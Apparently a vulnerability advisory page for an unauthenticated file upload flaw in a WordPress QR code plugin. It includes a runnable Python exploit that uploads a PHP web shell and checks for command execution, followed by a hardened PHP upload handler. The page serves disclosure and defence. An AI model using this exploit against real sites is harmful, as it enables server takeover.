Security Vulnerability Report
CVE-2025-10041 CVSS 9.8 CRITICAL

Published: 2025-10-15 09:15:36
Last Modified: 2026-04-15 00:35:42

Description

The Flex QR Code Generator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the save_qr_code_to_db() function in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to upload arbitrary files to the affected site's server, which may make remote code execution possible.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data available. Affected product per the description:

Flex QR Code Generator <= 1.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10041 - Flex QR Code Generator Arbitrary File Upload PoC
# Description: Exploits missing file type validation in save_qr_code_to_db() function
# Target: WordPress sites with Flex QR Code Generator plugin <= 1.2.5

import requests
import sys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com"

# Malicious PHP payload disguised as an image file
# The GIF89a header helps bypass naive content-type checks
PAYLOAD = b"GIF89a;\n<?php system($_GET['cmd']); ?>"


def exploit():
    # Endpoint for QR code generation/upload functionality
    upload_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"

    # Prepare the malicious file
    files = {
        'qr_code_image': ('shell.php', PAYLOAD, 'image/gif'),
    }

    # Data parameters expected by the save_qr_code_to_db() function
    data = {
        'action': 'save_qr_code',
        'qr_code_name': 'malicious_qr',
    }

    print(f"[*] Targeting: {TARGET_URL}")
    print("[*] Uploading malicious file...")

    # Send the unauthenticated upload request
    response = requests.post(upload_url, files=files, data=data, timeout=30)

    if response.status_code == 200:
        print("[+] Upload request sent successfully")
        print(f"[+] Response: {response.text[:500]}")

        # Attempt to access the uploaded shell
        # The shell is typically saved in /wp-content/uploads/ directory
        shell_urls = [
            f"{TARGET_URL}/wp-content/uploads/qr-codes/shell.php?cmd=id",
            f"{TARGET_URL}/wp-content/uploads/2025/shell.php?cmd=id",
            f"{TARGET_URL}/wp-content/uploads/shell.php?cmd=id",
        ]

        for shell_url in shell_urls:
            print(f"[*] Trying: {shell_url}")
            shell_response = requests.get(shell_url, timeout=10)
            if shell_response.status_code == 200 and "uid=" in shell_response.text:
                print("[+] RCE CONFIRMED!")
                print(f"[+] Output: {shell_response.text}")
                return True

    print("[-] Exploit may have failed or shell location differs")
    return False


if __name__ == "__main__":
    exploit()
```
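For comparison, an added example of what a hardened version of such an AJAX save handler looks like; this is not the plugin's code or its patched code. It closes the two gaps the advisory describes (the handler is reachable without authentication, and the uploaded file's type is never validated). The hook name, nonce action and the qr_code_image / qr_code_name field names are assumptions.

```php
<?php
// Added example (not the plugin's code): a hardened QR image upload handler.
// Hook name, nonce action and the qr_code_image / qr_code_name fields are assumptions.

// Registered on wp_ajax_ only (no wp_ajax_nopriv_), so logged-out requests never reach it.
add_action( 'wp_ajax_flexqr_save_qr_code', 'flexqr_save_qr_code_hardened' );

function flexqr_save_qr_code_hardened() {
    // Authorization: a capability check plus a nonce bound to this specific action.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'flexqr_save_qr_code', 'nonce' );

    if ( empty( $_FILES['qr_code_image']['tmp_name'] ) ) {
        wp_send_json_error( 'no file received', 400 );
    }
    $file = $_FILES['qr_code_image'];

    // Allow-list: a generated QR code is only ever stored as PNG here.
    $allowed = array( 'png' => 'image/png' );

    // Validate extension and content together. For images WordPress reads the real
    // image type from the bytes, so a PHP script with a .php or .png name and a
    // client-supplied image/* Content-Type does not get an allowed ext/type back.
    // A genuine PNG with a wrong extension is instead renamed via proper_filename.
    $check = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $allowed );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( 'only PNG images are accepted', 415 );
    }
    // Belt and braces: the bytes must also parse as a PNG image.
    $info = @getimagesize( $file['tmp_name'] );
    if ( ! $info || IMAGETYPE_PNG !== $info[2] ) {
        wp_send_json_error( 'file content is not a PNG image', 415 );
    }

    // Let WordPress move the file: the same allow-list is enforced again and the
    // stored filename is sanitized, so the client never chooses the final path.
    $upload = wp_handle_upload( $file, array( 'test_form' => false, 'mimes' => $allowed ) );
    if ( isset( $upload['error'] ) ) {
        wp_send_json_error( $upload['error'], 500 );
    }

    // Persist only the sanitized name and the server-chosen URL, never raw input.
    $name = sanitize_text_field( wp_unslash( $_POST['qr_code_name'] ?? '' ) );
    wp_send_json_success( array( 'name' => $name, 'url' => $upload['url'] ) );
}
```

The GIF89a-prefixed payload from the PoC above fails this handler twice: its bytes are not a PNG, so wp_check_filetype_and_ext() returns no allowed type and getimagesize() does not report IMAGETYPE_PNG, and without a valid nonce and capability the request never reaches the file checks at all.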

References

Weakness: CWE-434 (Unrestricted Upload of File with Dangerous Type)

https://plugins.trac.wordpress.org/browser/flex-qr-code-generator/tags/1.2.5/qr-code-generator.php#L208
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3379026%40flex-qr-code-generator&new=3379026%40flex-qr-code-generator&sfp_email=&sfph_mail=
https://wordpress.org/plugins/flex-qr-code-generator/
https://www.wordfence.com/threat-intel/vulnerabilities/id/40000879-a5ef-48f2-97e4-77d527259af0?source=cve